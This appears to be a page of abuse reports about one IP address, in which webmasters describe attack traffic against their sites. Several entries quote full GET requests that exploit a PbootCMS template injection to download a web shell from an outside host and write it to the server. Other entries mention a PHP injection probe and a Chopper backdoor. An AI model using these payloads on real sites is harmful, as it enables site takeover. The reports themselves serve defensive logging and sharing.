trolled multiple websites with "${@print(md5(31337))}\x5C" in referrer entry in requests (was not su ...
show moretrolled multiple websites with "${@print(md5(31337))}\x5C" in referrer entry in requests (was not successful, but was annoying)
show less
Aggressive requests (10/sec) -- may be crawler but claims to be "Mozilla/5.0 (Windows NT 10.0; Win64 ...
show moreAggressive requests (10/sec) -- may be crawler but claims to be "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
show less
Uses GET requests of:
"GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/( ...
show moreUses GET requests of:
"GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/bb123.php&t2=file_get_contents&t3=http://www.wjzgc.com/shell/4045.zip HTTP/1.0"
"GET /?tag&tagstpl=about.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/bb123.php/&t2=file_get_contents&t3=http://www.wjzgc.com/shell/4045.zip HTTP/1.0"
"GET /?tag&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&tagstpl=news.html&t=file_put_contents&t1=runtime/cache/bb123.php&t2=file_get_contents&t3=http://www.wjzgc.com/shell/4045.zip HTTP/1.0"
The 4045.zip file is a heavily obfuscated PHP web shell script.
show less
repeat POST to contact form with non-successful challenges .. an annoyance every second for several ...
show morerepeat POST to contact form with non-successful challenges .. an annoyance every second for several hours. All attempts unsuccessful.
show less
Excessive accesses, not obeying robots.txt, false user-agent string of "Mozilla/5.0 (Windows NT 10.0 ...
show moreExcessive accesses, not obeying robots.txt, false user-agent string of "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
show less
Uses FTP to inject malware PHP script to document root.
Malware file name is {site-url}_{unixtime}. ...
show moreUses FTP to inject malware PHP script to document root.
Malware file name is {site-url}_{unixtime}.php and contains Backdoor:PHP/Chopper.B!dha script
show less
thousands of 400 errors. URL queries are encoded scripts attempting SQL injection or shell access. ...
show morethousands of 400 errors. URL queries are encoded scripts attempting SQL injection or shell access. None worked.. just filled up the logs.
show less
excessive 404s for domain-name related non-existent .zip files.
Likely looking for website backups ...
show moreexcessive 404s for domain-name related non-existent .zip files.
Likely looking for website backups to exploit
show less